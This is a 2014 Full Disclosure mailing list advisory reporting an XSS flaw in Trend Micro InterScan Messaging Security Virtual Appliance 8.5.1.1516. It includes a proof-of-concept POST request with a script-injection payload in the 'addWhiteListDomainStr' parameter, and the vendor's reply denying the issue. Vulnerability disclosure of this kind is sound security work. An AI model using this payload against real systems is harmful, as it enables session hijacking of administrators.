Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance 8.5.1.1516 (Zero-DAY)
From: William Costa <william.costa () gmail com>
Date: Thu, 29 May 2014 12:55:03 -0300

I. VULNERABILITY
-------------------------

XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance
8.5.1.1516

II. DESCRIPTION
-------------------------
Has been detected a XSS vulnerability in InterScan Messaging Security
Virtual Appliance version 8.5.1.1516.
The code injection is done through the parameter "addWhiteListDomainStr"
send via post in the page “/addWhiteListDomain.imss”

III. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter
“addWhiteListDomainStr” correctly.


https://10.200.210.100:8445/addWhiteListDomain.imss

Host=10.200.210.100:8445
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0)
Gecko/20100101 Firefox/29.0
Accept=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate Referer=
https://186.230.33.160/trend-interscan/trend.php
Cookie=JSESSIONID=68D4F0AEF4874173BDE77FAA4895231F; CurrentLocale=en- US;
PHPSESSID=2ok068gfak8np5isbe5k5l4nf3; un=7164ceee6266e893181da6c33936e4a4;
userID=1; LANG=en;
wids=modImsvaSystemUseageWidget,modImsvaMailsQueueWidget,modImsvaQuara
ntineWidget,modImsvaArchiveWidget,; lastID=15; theme=default; lastTab=1;
GetPageTab=1
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=95
POSTDATA=addWhiteListDomainStr=aaaa.com"><script>alert(document.cookie
);</script>)


https://vimeo.com/96757096


IV. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, that allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser allowing session
hijacking.

V. SYSTEMS AFFECTED
-------------------------
Tested in InterScan Messaging Security Virtual Appliance 8.5.1.1516

VI. SOLUTION
------------------------

Answer from Trend.

Hi William,


According to our Product Developers, this is not vulnerability of our
product. All of the cookies(not just IMSVA) can be stolen from a
compromised environment. It was highly suggested that you upgrade your
client to ensure safety.
Also, they recommended another Trend Micro Product  -"OfficeScan" that may
be suitable for your environment.

I hope this information helps. Please let me know if you have additional
questions or clarifications.

Have a great day!



By William Costa

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

  By Date           By Thread  

Current thread:
  • XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance 8.5.1.1516 (Zero-DAY) William Costa (May 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]